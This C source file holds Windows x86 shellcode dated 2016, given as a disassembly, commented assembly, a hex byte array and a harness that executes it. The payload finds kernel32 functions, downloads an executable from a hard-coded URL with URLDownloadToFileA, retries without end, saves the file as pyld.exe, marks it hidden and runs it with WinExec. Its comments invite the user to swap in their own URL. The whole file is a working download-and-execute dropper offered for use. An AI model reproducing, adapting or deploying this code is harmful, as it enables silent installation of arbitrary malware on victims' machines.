/*
	Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
	Date : 12-07-2016
	Author : Roziul Hasan Khan Shifat
	Tested on: Windows 7 x86


*/

/*


Disassembly of section .text:

00000000 <_start>:
   0:	31 c9                	xor    %ecx,%ecx
   2:	64 8b 41 30          	mov    %fs:0x30(%ecx),%eax
   6:	8b 40 0c             	mov    0xc(%eax),%eax
   9:	8b 70 14             	mov    0x14(%eax),%esi
   c:	ad                   	lods   %ds:(%esi),%eax
   d:	96                   	xchg   %eax,%esi
   e:	ad                   	lods   %ds:(%esi),%eax
   f:	8b 48 10             	mov    0x10(%eax),%ecx
  12:	8b 59 3c             	mov    0x3c(%ecx),%ebx
  15:	01 cb                	add    %ecx,%ebx
  17:	8b 5b 78             	mov    0x78(%ebx),%ebx
  1a:	01 cb                	add    %ecx,%ebx
  1c:	8b 73 20             	mov    0x20(%ebx),%esi
  1f:	01 ce                	add    %ecx,%esi
  21:	31 d2                	xor    %edx,%edx

00000023 <count>:
  23:	42                   	inc    %edx
  24:	ad                   	lods   %ds:(%esi),%eax
  25:	01 c8                	add    %ecx,%eax
  27:	81 38 47 65 74 50    	cmpl   $0x50746547,(%eax)
  2d:	75 f4                	jne    23 <count>
  2f:	81 78 04 72 6f 63 41 	cmpl   $0x41636f72,0x4(%eax)
  36:	75 eb                	jne    23 <count>
  38:	81 78 08 64 64 72 65 	cmpl   $0x65726464,0x8(%eax)
  3f:	75 e2                	jne    23 <count>
  41:	8b 73 1c             	mov    0x1c(%ebx),%esi
  44:	01 ce                	add    %ecx,%esi
  46:	8b 14 96             	mov    (%esi,%edx,4),%edx
  49:	01 ca                	add    %ecx,%edx
  4b:	31 f6                	xor    %esi,%esi
  4d:	89 d6                	mov    %edx,%esi
  4f:	89 cf                	mov    %ecx,%edi
  51:	31 c0                	xor    %eax,%eax
  53:	50                   	push   %eax
  54:	68 61 72 79 41       	push   $0x41797261
  59:	68 4c 69 62 72       	push   $0x7262694c
  5e:	68 4c 6f 61 64       	push   $0x64616f4c
  63:	54                   	push   %esp
  64:	51                   	push   %ecx
  65:	ff d2                	call   *%edx
  67:	83 c4 0c             	add    $0xc,%esp
  6a:	31 c9                	xor    %ecx,%ecx
  6c:	68 6c 6c 41 41       	push   $0x41416c6c
  71:	88 4c 24 02          	mov    %cl,0x2(%esp)
  75:	68 6f 6e 2e 64       	push   $0x642e6e6f
  7a:	68 75 72 6c 6d       	push   $0x6d6c7275
  7f:	54                   	push   %esp
  80:	ff d0                	call   *%eax
  82:	83 c4 0c             	add    $0xc,%esp
  85:	31 c9                	xor    %ecx,%ecx
  87:	68 65 41 42 42       	push   $0x42424165
  8c:	88 4c 24 02          	mov    %cl,0x2(%esp)
  90:	68 6f 46 69 6c       	push   $0x6c69466f
  95:	68 6f 61 64 54       	push   $0x5464616f
  9a:	68 6f 77 6e 6c       	push   $0x6c6e776f
  9f:	68 55 52 4c 44       	push   $0x444c5255
  a4:	54                   	push   %esp
  a5:	50                   	push   %eax
  a6:	ff d6                	call   *%esi
  a8:	83 c4 14             	add    $0x14,%esp
  ab:	50                   	push   %eax

000000ac <download>:
  ac:	58                   	pop    %eax
  ad:	31 c9                	xor    %ecx,%ecx
  af:	51                   	push   %ecx
  b0:	68 2e 65 78 65       	push   $0x6578652e
  b5:	68 6d 70 6c 65       	push   $0x656c706d
  ba:	68 30 2f 73 61       	push   $0x61732f30
  bf:	68 36 2e 31 33       	push   $0x33312e36
  c4:	68 36 38 2e 38       	push   $0x382e3836
  c9:	68 39 32 2e 31       	push   $0x312e3239
  ce:	68 3a 2f 2f 31       	push   $0x312f2f3a
  d3:	68 68 74 74 70       	push   $0x70747468
  d8:	54                   	push   %esp
  d9:	59                   	pop    %ecx
  da:	31 db                	xor    %ebx,%ebx
  dc:	53                   	push   %ebx
  dd:	68 2e 65 78 65       	push   $0x6578652e
  e2:	68 70 79 6c 64       	push   $0x646c7970
  e7:	54                   	push   %esp
  e8:	5b                   	pop    %ebx
  e9:	31 d2                	xor    %edx,%edx
  eb:	50                   	push   %eax
  ec:	52                   	push   %edx
  ed:	52                   	push   %edx
  ee:	53                   	push   %ebx
  ef:	51                   	push   %ecx
  f0:	52                   	push   %edx
  f1:	ff d0                	call   *%eax
  f3:	59                   	pop    %ecx
  f4:	83 c4 2c             	add    $0x2c,%esp
  f7:	31 d2                	xor    %edx,%edx
  f9:	39 d0                	cmp    %edx,%eax
  fb:	51                   	push   %ecx
  fc:	75 ae                	jne    ac <download>
  fe:	5a                   	pop    %edx
  ff:	31 d2                	xor    %edx,%edx
 101:	68 73 41 42 42       	push   $0x42424173
 106:	88 54 24 02          	mov    %dl,0x2(%esp)
 10a:	68 62 75 74 65       	push   $0x65747562
 10f:	68 74 74 72 69       	push   $0x69727474
 114:	68 69 6c 65 41       	push   $0x41656c69
 119:	68 53 65 74 46       	push   $0x46746553
 11e:	54                   	push   %esp
 11f:	57                   	push   %edi
 120:	ff d6                	call   *%esi
 122:	83 c4 14             	add    $0x14,%esp
 125:	31 c9                	xor    %ecx,%ecx
 127:	51                   	push   %ecx
 128:	68 2e 65 78 65       	push   $0x6578652e
 12d:	68 70 79 6c 64       	push   $0x646c7970
 132:	54                   	push   %esp
 133:	59                   	pop    %ecx
 134:	31 d2                	xor    %edx,%edx
 136:	83 c2 02             	add    $0x2,%edx
 139:	52                   	push   %edx
 13a:	51                   	push   %ecx
 13b:	ff d0                	call   *%eax
 13d:	83 c4 08             	add    $0x8,%esp
 140:	31 c9                	xor    %ecx,%ecx
 142:	68 78 65 63 41       	push   $0x41636578
 147:	88 4c 24 03          	mov    %cl,0x3(%esp)
 14b:	68 57 69 6e 45       	push   $0x456e6957
 150:	54                   	push   %esp
 151:	57                   	push   %edi
 152:	ff d6                	call   *%esi
 154:	83 c4 08             	add    $0x8,%esp
 157:	31 c9                	xor    %ecx,%ecx
 159:	51                   	push   %ecx
 15a:	68 2e 65 78 65       	push   $0x6578652e
 15f:	68 70 79 6c 64       	push   $0x646c7970
 164:	54                   	push   %esp
 165:	59                   	pop    %ecx
 166:	31 d2                	xor    %edx,%edx
 168:	52                   	push   %edx
 169:	51                   	push   %ecx
 16a:	ff d0                	call   *%eax
 16c:	83 c4 08             	add    $0x8,%esp
 16f:	31 c9                	xor    %ecx,%ecx
 171:	68 65 73 73 41       	push   $0x41737365
 176:	88 4c 24 03          	mov    %cl,0x3(%esp)
 17a:	68 50 72 6f 63       	push   $0x636f7250
 17f:	68 45 78 69 74       	push   $0x74697845
 184:	54                   	push   %esp
 185:	57                   	push   %edi
 186:	ff d6                	call   *%esi
 188:	ff d0                	call   *%eax


*/



/*

section .text
	global _start
_start:

xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList
lodsd 
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address
;------------------------------------

mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY

mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
xor edx,edx

count:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count

;---------------------------------------------

mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx

mov edx,[esi+edx*4]
add edx,ecx ;edx=GetProcAddress()

;-----------------------------------------

xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll

;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c

push esp
push ecx

call edx

;------------------------
add esp,12
;-----------------------------

;LoadLibraryA("urlmon.dll")
xor ecx,ecx

push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275

push esp
call eax

;-----------------------

add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255

push esp
push eax
call esi

;------------------------
add esp,20
push eax 
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx

;-----------------------------
;change it to file url

push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------


push esp 
pop ecx ;url http://192.168.86.130/sample.exe

xor ebx,ebx
push ebx

;------------------------
;save as (no need change it.if U want to change it,do it)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as

xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx

call eax

;-------------------------

pop ecx
add esp,44
xor edx,edx
cmp eax,edx
push ecx
jnz download ;if it fails to download , retry contineusly
;------------------
pop edx

;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx


push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553

push esp
push edi

call esi

;--------------------------------

add esp,20 ;U must adjust stack or it will crash
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN) 
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970

push esp
pop ecx

xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN

push edx
push ecx

call eax

;-------------------

add esp,8
;---------------------------

;finding address of WinExec()
xor ecx,ecx

push 0x41636578
mov [esp+3],byte cl
push 0x456e6957

push esp
push edi
call esi

;----------------------

add esp,8

;------------------------
;calling WinExec("pyld.exe",0)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970

push esp
pop ecx

xor edx,edx
push edx
push ecx

call eax
;-------------------------

add esp,8
;-----------------------------

;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845

push esp
push edi

call esi

;--------------
call eax



*/

#include<stdio.h>
#include<string.h>

char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";

main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
